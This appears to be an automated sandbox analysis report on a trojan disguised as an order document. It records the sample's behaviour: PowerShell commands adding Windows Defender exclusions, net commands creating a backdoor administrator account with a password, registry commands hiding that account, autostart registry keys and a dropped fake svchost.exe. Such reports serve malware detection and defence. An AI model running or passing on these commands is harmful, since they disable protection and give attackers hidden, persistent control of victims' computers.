                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID=&apos;6588&apos;
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeWMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle=&quot;6588&quot;::GetOwner
                      Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID=&apos;4876&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle=&quot;4876&quot;::GetOwner
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID=&apos;6712&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeWMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle=&quot;6712&quot;::GetOwner
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@71/19@1/1
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_01
                      Source: #NEW ORDER FOR JANUARY 2022.exe, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.0.dr, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.0.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.csCryptographic APIs: 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: aspnet_regbrowsers.pdbp source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
                      Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb?x source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_regbrowsers.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
                      Source: Binary string: ilasm.pdb source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
                      Source: Binary string: ComSvcConfig.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_00DF9101 push ebx; ret
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0581060B pushad ; retf
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_05812C5E pushfd ; ret
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeCode function: 0_2_0581C95B push eax; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_00BF9101 push ebx; ret
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_053F2504 push E802005Eh; ret
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EF6B8 push eax; retf
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 32_2_078EFC53 push eax; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_00FB9101 push ebx; ret
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EDE0 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeCode function: 36_2_0878EE98 pushfd ; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 37_2_058E03EF push E801005Eh; ret
                      Source: #NEW ORDER FOR JANUARY 2022.exeStatic PE information: 0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.93856030024
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.93856030024

                      Persistence and Installation Behavior:

                      barindex
                      Adds a new user with administrator rightsShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeFile created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECCJump to behavior
                      Creates autostart registry keys with suspicious namesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECCJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Contains functionality to hide user accountsShow sources
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmpString found in binary or memory: laREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmpString found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
